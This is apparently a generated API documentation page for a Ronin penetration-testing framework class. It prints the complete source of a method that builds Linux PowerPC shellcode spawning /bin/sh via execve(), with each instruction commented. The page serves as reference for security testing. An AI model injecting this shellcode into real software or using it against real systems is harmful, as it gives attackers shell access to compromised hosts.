Class: Ronin::Payloads::Shellcode::Linux::PPC::ExecShell
- Inherits:
-
ExecShellPayload
- Object
- Payload
- BinaryPayload
- ASMPayload
- Ronin::Payloads::ShellcodePayload
- ExecShellPayload
- Ronin::Payloads::Shellcode::Linux::PPC::ExecShell
- Defined in:
- lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb
Overview
Linux PPC shellcode that calls execve() with /bin/sh.
Instance Attribute Summary
Attributes inherited from Payload
Instance Method Summary collapse
-
#build ⇒ Object
Builds the shellcode.
Methods inherited from Ronin::Payloads::ShellcodePayload
Methods inherited from ASMPayload
#assemble, assembler, payload_type
Methods included from Metadata::OS
Methods included from Metadata::Arch
Methods inherited from BinaryPayload
Methods inherited from Payload
#built?, #built_payload, #bytesize, #cleanup, #encode_payload, #encoded_payload, encoder_class, #initialize, #length, payload_type, #perform_build, #perform_cleanup, #perform_postlaunch, #perform_prelaunch, #perform_validate, #postlaunch, #prelaunch, #rebuild_payload, #reencode_payload, register, #to_s, #validate
Constructor Details
This class inherits a constructor from Ronin::Payloads::Payload
Instance Method Details
#build ⇒ Object
Builds the shellcode.
53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 |
# File 'lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb', line 53 def build @payload = "\x7c\x3f\x0b\x78".b + # mr r31,r1 "\x7c\xa5\x2a\x79".b + # xor. r5,r5,r5 "\x42\x40\xff\xf9".b + # bdzl+ 10000454< main> "\x7f\x08\x02\xa6".b + # mflr r24 "\x3b\x18\x01\x34".b + # addi r24,r24,308 "\x98\xb8\xfe\xfb".b + # stb r5,-261(r24) "\x38\x78\xfe\xf4".b + # addi r3,r24,-268 "\x90\x61\xff\xf8".b + # stw r3,-8(r1) "\x38\x81\xff\xf8".b + # addi r4,r1,-8 "\x90\xa1\xff\xfc".b + # stw r5,-4(r1) "\x3b\xc0\x01\x60".b + # li r30,352 "\x7f\xc0\x2e\x70".b + # srawi r0,r30,5 "\x44\xde\xad\xf2".b + # .long 0x44deadf2 "/bin/shZ".b # the last byte becomes NULL end |